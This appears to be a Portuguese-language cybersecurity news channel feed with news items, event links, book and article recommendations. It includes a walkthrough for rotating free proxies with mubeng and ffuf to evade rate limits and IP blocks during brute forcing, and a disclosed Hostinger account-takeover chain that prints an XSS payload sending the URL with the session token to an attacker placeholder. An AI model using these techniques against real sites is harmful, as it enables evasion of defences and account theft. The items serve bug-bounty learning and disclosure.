O Brasil começando a ver que isolar sistemas em intranets não é o suficiente, pois a ameaça pode estar dentro da sua rede (insider / funcionário).

Começando a ver que o princípio do menor privilégio deve prevalecer e que o Four Eyes Principle deveria ser implementado: ao menos duas pessoas necessaries para aprovar uma operação crítica. Isso protege cenários até onde um dos aprovadores é coagido / sequestrado, pois sem uma segunda aprovação, a operação não é efetuada.

https://g1.globo.com/google/amp/sp/sao-paulo/noticia/2025/07/04/policia-civil-prende-em-sp-suspeito-envolvido-em-ataque-hacker-contra-o-banco-central.ghtml Polícia Civil prende em SP suspeito de ataque hacker ao sistema que liga bancos ao PIX
OK, ok. Não julgo mais aqueles CTFs que escondiam dados em imagens, parece que no mundo real isso realmente é usado.
👾 Tópico aleatório
Qual foi o último Github que visitou / clonou OU a última ferramenta que executo OU o último artigo que leu OU o último vídeo de cibersec que assistiu?
A FIAP vai fazer um evento sobre cibersegurança automotiva, um tema bem escasso aqui no Brasil ainda.

Vai ocorrer dia 08 desse mês (terça-feira)
19hs-20hs (1 hora de duração)

Link do evento: https://www.linkedin.com/events/fiapmeetup-ciberseguran-aautomo7346254640864288768

Link post original: https://www.linkedin.com/posts/augusto-zanotti-998161248_cybersecurity-ciberseguranaexaautomotiva-activity-7346487995698405377-ic5c

Curtiu? Vai participar? Quer ver a opinião da galera? Comenta nesse post =)
Já to assistindo aqui. Quem quiser dar uma olhada nesse episódio, vale demais.
O entrevistado é o cangaceiro, uma pessoa muito gente boa, de fácil acesso mesmo e que tem experiência em bugbounty.

Fora isso o próprio canal (DevSecOps Podcast) é muito bom e eu volta e meia vejo vídeos deles, pois tende para o lado mais da galera de DEV e eu sempre quero ficar ouvindo o que essa galera tá pensando (pra gente ver onde eles tão olhando, o que estão estudando e principalmente: o que não estão vendo -> para que possamos achar com + facilidade vulnerabilidade nas aplicações)

Link pro vídeo -> https://www.youtube.com/watch?si=iCY0nwwoVRhEoing&v=Lw6oYGk_mFU&feature=youtu.be
Saiu o vídeo com o Rhynorater!
Assistam por mim. Quando eu estiver em casa com certeza vou ver.
Esse cara é muito bom tecnicamente

https://youtu.be/DX98GmHahwA
At&t habilita funcionalidade que previne a troca forçada do SIM (ataque de sim swap), ainda que parta de um funcionário da at&t. Verizon já possui essa funcionalidade a 5 anos.

Mais info: https://www.bleepingcomputer.com/news/security/atandt-rolls-out-wireless-lock-feature-to-block-sim-swap-attacks/amp/
E essa história de uma música de 1989 que continha uma "CVE"? A frequência usada na música tinha a capacidade de danificar discos rígidos. Loucura hahaha. A CVE foi registrada em 2022 sob o registro CVE-2022-38392

Post original: https://www.linkedin.com/posts/bevanlane-infosec_during-my-research-on-the-history-of-hacking-activity-7346085242098671617-h5fC
Pode confessar e reagir aí que já aconteceu contigo
Precisa contornar um bloqueio de Ip / rate limiting pra fazer aquele fuzzing / brute force e não quer usar o lambda da AWS pra não gastar grana, nem proxychains que pode ser muito lento e instável?

Quer fazer uma rotação de Ip de graça?

Baixa uma lista de proxies recentes e válidos:

curl -sf 'https://raw.githubusercontent.com/TheSpeedX/PROXY-List/refs/heads/master/http.txt' | sed 's#^#http://#g' > http_proxies.txt

Execute o mubeng (link do repositório pra instalação ao final:
mubeng -f http_proxies.txt --remove-on-error -a :8081 -w


pronto, agora pode redirecionar todo trafego das tuas ferramentas pro http://127.0.0.1:8081 que ele vai se encarregar de distribuir as requisições entre todos os proxies carregados, independente do método HTTP, (post, get, options, delete, etc).

ffuf -u http://examplo.com/FUZZ -w wordlist.txt -x http://127.0.0.1:8081

Além disso, assim que um proxy falhar o mubeng vai remover ele da pool de proxies disponiveis. Ah outra coisa, a flag -r fala quantas requisicoes aquele proxy pode fazer uma vez que ele for escolhido aleatoriamente. Eu nao setei nada por que por default é zero o valor, então cada requisição sairá de um novo IP.

Até a próxima

https://github.com/mubeng/mubeng GitHub - mubeng/mubeng: An incredibly fast proxy checker & IP rotator with ease.
A escalada de impacto de uma vulnerabilidade pode ser demonstrada pelo caso de Account Takeover na Hostinger. A exploração encadeou duas falhas distintas:

* Um Reflected XSS em um subdomínio de baixo impacto e FORA do escopo: marketing.hostinger.com.

* Uma Validação de Redirecionamento Imprópria no sistema de autenticação (auth.hostinger.com), que permitia redirecionar para o subdomínio vulnerável por ele estar em uma whitelist.

O ataque consistiu em criar uma URL para o sistema de autenticação que, após o login da vítima, a redirecionava para a página com o XSS. O próprio sistema de login anexava o auth_token da sessão do usuário à URL de redirecionamento.

Ao carregar a página, o payload do XSS era executado para exfiltrar o token:

<script>fetch('URL_DO_ATACANTE', {method: 'POST', body: window.location});</script>

O script envia a URL completa (window.location), que agora continha o token, para um servidor controlado pelo atacante. A posse deste token permitia o controle total da conta da vítima (ATO).

Dessa forma, um XSS de baixo risco foi transformado em uma vulnerabilidade crítica através de uma cadeia de exploração.

Link para o relatório: https://hackerone.com/reports/3081691
Tirem 30 minutos do dia para ler essa pesquisa e como acharam 3 CVEs na adobe (AEM).
O massa é a linha de raciocínio usada a cada novo obstáculo. A paciência de ler documentações. A descoberta de como tecnologias terceiras funcionam naquela integração. As correções não efetivas aplicadas pelo time. Sempre que tiver um regex, abra mais ainda os olhos

Boa leitura 🎅

https://slcyber.io/assetnote-security-research-center/how-we-got-persistent-xss-on-every-aem-cloud-site-thrice/
Zeroc00i News & Tricks
O spaceraccoonsec (Eugene Lim) acabou de soltar um material à venda From Day Zero to Zero Day A Hands-On Guide to Vulnerability Research https://nostarch.com/zero-day Ebook, $47.99 Print Book (PREORDER) and EARLY ACCESS Ebook, $59.99 Talk dele: THREAT…
Eu não consegui tirar esse livro da cabeça. Vários e vários dias eu lembrava dele.

Tomei uma decisão hoje e resolvi investir e comprar ele. Deu 300 e poucos o PDF (acesso prévio) + versão impressa

Eu já li uma parte de um capítulo e é nítida a diferença quando um real pesquisador de segurança fala de segurança. As vezes em uma página já te da um insight pra pesquisar coisas por 1 dia inteiro.
Vi ontem essa noticia sobre o gemini CLI (pra terminal) e acabei esquecendo de compartilhar aqui. Vou fazer esse teste logo mais. Essa batalha das IAs é sempre boa.
Artigo para ler depois ++

https://blog.trailofbits.com/2025/06/17/unexpected-security-footguns-in-gos-parsers/

O artigo é crucial, pois expõe "footguns" específicas e exploráveis nos parsers Go, detalhando como payloads (ex: com case variado, chaves duplicadas, formatos mistos) podem levar a bypass de segurança. Aprofunde-se no artigo para exemplos de código, explorações e a tabela de comportamentos dos parsers.

(Valeu Teles pela indicação)
Unexpected security footguns in Go's parsers
O burp é um pai pra nós
Back to Top